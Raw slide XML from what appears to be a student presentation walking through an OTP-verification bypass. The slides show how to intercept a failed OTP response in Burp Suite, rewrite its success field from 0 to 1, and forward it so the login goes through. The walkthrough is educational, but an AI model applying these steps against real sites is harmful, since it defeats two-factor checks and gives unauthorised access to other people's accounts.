              <a:t>PART 1</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="0"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sp>
        <p:nvSpPr>
          <p:cNvPr id="1964" name="Google Shape;1964;p285"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="144304" y="0"/>
            <a:ext cx="6473400" cy="10923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Clr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>INVENTIVE STEPS (TECHNOLOGIES)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1965" name="Google Shape;1965;p285"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179260" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1966" name="Google Shape;1966;p285"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="207645" y="1051560"/>
            <a:ext cx="9318900" cy="33234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lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Firstly, select any site for the attack (i.e www.anyexample.com)</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Step1: It is to configure your browser proxy with the burp suite and burp suite </a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>proxy listener, for this you need to change your browser settings by going</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t> into preferences and then in the proxy setting.</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>So the proxy host address is by default 127.0.0.1. And the port is 8080 by default for both protocols (HTTP and HTTPS)</a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Step2: Now, After Setting up account or login credentials, it needs OTP to verify. Now, turn ON your burpsuite’s intercept. </a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Now, type any wrong OTP and intercept after capturing the request, do action and send it to the intruder. After sending to the intruder forward the post request. Then the packet code reaches to the intruder from the server.   </a:t>
            </a:r>
            <a:endParaRPr sz="1500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1967" name="Google Shape;1967;p285"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4074122" y="4785315"/>
            <a:ext cx="1135800" cy="369300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>PART 3</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1968" name="Google Shape;1968;p285"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5162074" y="1051560"/>
            <a:ext cx="3746700" cy="1004700"/>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1973" name="Google Shape;1973;p286"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45720" y="0"/>
            <a:ext cx="6989100" cy="10923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Clr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>OPERATIONAL FLOW OF THE WORK</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1974" name="Google Shape;1974;p286"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="45720" y="770572"/>
            <a:ext cx="8718300" cy="4577100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="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In the response the server gives error as codes and if the statement is successful it gives codes like 1, correct, true etc and if the statement is unsuccessful it gives codes like 0, incorrect, false etc.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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if we get error or unsuccess codes we have to change it to Success. </a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>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0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>{“message”:”OTP incorrect!”,”code”:400,”success”:0}</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>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0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>{“message”:”OTP correct!”,”code”:400,”success”:1}</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>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215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="80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after changing codes successfully we forward the request to the server. After we send the request to the server, it accepts the query and says OTP is correct. </a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="215900" marR="0" lvl="0" indent="-215900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>And hence OTP is bypassed.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1975" name="Google Shape;1975;p286"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4074122" y="4785315"/>
            <a:ext cx="1135800" cy="369300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>PART 3</a:t>
            </a:r>
            <a:endParaRPr sz="2700" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1976" name="Google Shape;1976;p286"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5291138" y="2345055"/>
            <a:ext cx="3852900" cy="1526400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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1980"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1981" name="Google Shape;1981;p287"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951071" y="17145"/>
            <a:ext cx="4947900" cy="1044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Times New Roman"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>DEMONSTRATION PART</a:t>
            </a:r>
            <a:endParaRPr sz="3000" b="1" u="sng">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FF0000"/>
              </a:highlight>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1982" name="Google Shape;1982;p287"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179260" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1983" name="Google Shape;1983;p287"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121920" y="1328261"/>
            <a:ext cx="8718300" cy="3246900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4500" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:endParaRPr sz="4500" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="4500"/>
